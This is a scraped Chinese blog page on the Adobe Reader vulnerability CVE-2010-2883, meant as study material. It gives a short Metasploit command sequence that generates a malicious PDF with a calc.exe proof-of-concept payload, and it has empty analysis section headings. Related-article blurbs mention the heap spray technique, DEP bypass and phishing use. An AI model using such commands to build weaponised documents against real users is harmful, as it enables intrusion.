CVE-2010-2883

最新推荐文章于 2024-04-10 19:53:52 发布

iihacker_cat

最新推荐文章于 2024-04-10 19:53:52 发布

阅读量432

点赞数

分类专栏：二进制漏洞

本文链接：https://blog.csdn.net/xiaohua_de/article/details/78081110

版权

二进制漏洞专栏收录该内容

5 篇文章 0 订阅

订阅专栏

一环境准备

1 POC的准备

我们需要在被攻击的机器上面弹出calc.exe

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

2 Adober的准备

AdbeRdr930_zh_CN.exe

3 PDFStreamDumper准备

PDFStreamDumper_Setup.exe，用于提取SING表。

4 IDA

5 OD

二 IDA 静态分析

三 OD动态调试

四总结

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

iihacker_cat

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CVE-2010-2883分析

wangtiankuo的博客

10-10

2518

1 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 1.1 Heap Spray（堆喷）使用堆喷的时候，会将EIP指向堆区的0x0C0C0C0C位置，然后用JavaScript申请大量内存，用包含着0x90和shellcode的“内存片”覆盖这些内存。 J...

详解cve-2010-2553

小强的博客

07-25

1249

我的调试环境是win7旗舰版32位+wmpalyer+windbg+IDA。 poc见: https://www.exploit-db.com/exploits/15112/ wmpalyer设置页堆： C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe -i wmplayer.exe +h pa +htc Cu

参与评论您还未登录，请先登录后发表或查看评论

CVE-2010-2883字体文件SING表栈溢出

07-03

CVE-2010-2883字体文件SING表栈溢出，CVE-2010-2883字体文件SING表栈溢出

Adobe Reader 缓冲区溢出漏洞（CVE-2010-2883）漏洞分析报告

君子谬

11-28

2132

一. 简介软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危漏洞类型:缓冲区溢出威胁路径:远程机密性影响:完全的信息泄露导致所有系统文件暴露完整性影响:系统完整性可被完全破坏可用性影响:可能导致系统完全宕机攻击复杂度:漏洞利用存在一定的访问条件攻击向量:

[漏洞战争]漏洞复现：CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞

m0_51246873的博客

01-12

947

[漏洞战争]漏洞复现：CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞

Adobe Reader 缓冲区溢出漏洞（CVE-2010-2883）漏洞分析报告

m0_64973256的博客

01-20

937

一.简介软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危漏洞类型:缓冲区溢出威胁路径:远程机密性影响:完全的信息泄露导致所有系统文件暴露完整性影响:系统完整性可被完全破坏可用性影响:可能导致系统完全宕机攻击复杂度:漏洞利用存在一定的访问条件攻击向量:攻击者不需要获取内网访问权或本地访问权身份认证:漏洞利用无需身份认证二.软件介绍 Adobe Rea...

漏洞复现-CVE-2010-2883

滕财然的博客

02-26

1518

CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞，用户打开了特制的PDF文件可能导致执行恶意代码，可实现比如进行远程控制等。 2、漏洞分析反汇编工具IDA： IDA 是全球最智能、功能最完善的交互式反汇编程序，许多软件安全专家和黑客...

CVE-2010-2883 从漏洞分析到样本分析

qq_28205153的博客

08-19

5221

本文章将从漏洞利用分析开始，到样本分析结束，其中涉及到的知识点有PDF格式、TTF字体格式、缓冲区溢出漏洞利用、PE文件格式、软件脱壳和恶意代码分析。其中会演示一些基本操作，方便初学者进行复现。前置知识要学习本文章，需要下面的前置知识 C语言。可以看《C程序设计语言》。汇编语言。可以看《深入理解计算机系统》第三章。缓冲区溢出漏洞利用。可以看《0day安全：软件漏洞分析技术》。软件脱壳、PE文件格式。可以看《加密与解密》。恶意代码分析（可选）。可以看《恶意代码分析实战》。漏洞信息漏洞名称：

CVE-2010-2883：基于样本分析 PDF SING表字符溢出漏洞

CuiXY's Blog

02-01

313

0x01

【CVE-2010-2883】进行钓鱼攻击的研究

最新发布

Mr_Fmnwon的博客

04-10

255

最近作业中研究APT攻击，了解到2011年前后披露的LURID-APT，其中敌手利用了各种版本的文件查看器的漏洞实现攻击。CVE-2010-2883就是其中被利用的一个adobe reader的漏洞。Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞，用户打开了特制的PDF文件可能导致执行恶意代码，可实现比如进行远程控制等。输入exploit进行攻击利用，此时在某目录下生成用于攻击的携带木马的pdf文件。

CVE-2010-2883漏洞分析

weixin_46286477的博客

09-28

1096

CVE-2010-2883漏洞分析，从基础开始学习漏洞。

Luckcat攻击事件样本分析(利用cve-2010-2883)

Z_LiT0的博客

08-23

592

0x00 运行样本分析行为首先开启process monitor 监控，然后在打开样本文件：监控到cmd在temp目录下新建了svrhost.exe文件和_uninsep.bat文件。使用process expoler 发现病毒文件篡改了spoolsv.exe文件植入了恶意dll。首先去看下_uninsep.dat文件是什么：发现是一个自删除文件，执行完代码删除te...

CVE-2010-2883 PDF漏洞提权

EC_Carrot的博客

03-08

281

漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞，当用户打开特制的恶意PDF文件时，可允许任意代码远程执行。这个漏洞也比较老了，相信很多机子都不装Adobe Reader低版本了，但对于萌新来说，还是先从旧漏洞开始复现会比较合适影响版本 Adobe Reader 8.2.4 - 9.3.4 漏洞利用 Metasploit工具已经将相关的漏洞利用代码集成进来了，通过简单的步骤

CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞分析

xiaoeryu_的博客

03-18

926

CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞0x1：漏洞描述0x2：分析环境0x3：基于字符串定位的漏洞分析方法0x4：样本Exploit技术分析0x05：动态调试 0x1：漏洞描述 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞，用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 0x2：分析环境推荐使用的环境备注

动手实验 CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞

abelxu

02-08

2798

文章目录1.漏洞环境2.定位漏洞3.动态调试4.分析msf生成脚本4.1make_ttf4.2 make_js5.实现自己的shellcode绕过DEP5.1 利用ZwSetInformationProcess和SetProcessDEPPolicy关闭DEP(win xp sp3不能用)5.2 VirtualProtect绕过DEP5.3VirtualAlloc绕过DEP6.总结本文包括简单的漏洞分析和比较详细的exp动态调试，以及自己动手写exp绕过DEP的实践 1.漏洞环境环境备注

修复OpenSSH J PAKE漏洞CVE-2010-4478：Linux OpenSSH重装指南

"解决OpenSSH J-PAKE授权问题漏洞CVE-2010-4478的Linux上OpenSSH重装方法" OpenSSH是一款广泛使用的开源安全协议，用于在Linux和Unix系统之间提供加密的网络服务，如远程登录、文件传输等。然而，它也可能会存在...